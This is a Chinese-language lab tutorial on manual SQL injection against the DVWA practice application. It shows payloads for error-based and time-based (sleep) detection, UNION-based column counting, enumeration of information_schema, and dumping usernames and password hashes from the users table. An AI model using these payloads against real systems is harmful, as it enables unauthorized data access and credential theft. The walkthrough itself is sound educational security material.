OWASP-手动sql注入

时间:2024-05-18 19:55:28

登录靶机,进入dvwa

OWASP-手动sql注入

首先判断注入点:

1,错误的注入

输入框输入单引号',作用是闭合sql语句,点击submit

OWASP-手动sql注入

报语法错误,说明输入的内容未作任何处理,单引号被成功带入了sql

2,时间盲注

OWASP-手动sql注入

输入单引号发现页面没有报错,无任何变化,尝试用sleep方法 (1' and sleep(6) -- )

OWASP-手动sql注入

发现左上角有加载的动作,说明sleep方法起了作用,判断出这里有注入点

 

然后测试查询语句的字段数

通过' union select 1 --

OWASP-手动sql注入

如果报错说明查询语句的字段数不对,继续用' union select 1,2 -- 

OWASP-手动sql注入

判断出是两个字段

然后查询相关信息

version(),版本信息 database()当前数据库名 user()当前用户名

OWASP-手动sql注入

concat可以把多个字段作为一个字段输出

OWASP-手动sql注入

Information_schema 记录数据库的信息

OWASP-手动sql注入

查询数据库信息 ' union select table_schema,1 from information_schema.tables --

OWASP-手动sql注入

查询库和表 ' union select table_schema,table_name from information_schema.tables --

OWASP-手动sql注入

查询users表的字段信息' union select 1,column_name from information_schema.columns where table_name='users' --

OWASP-手动sql注入

查询账号密码' union select user,password from users --

OWASP-手动sql注入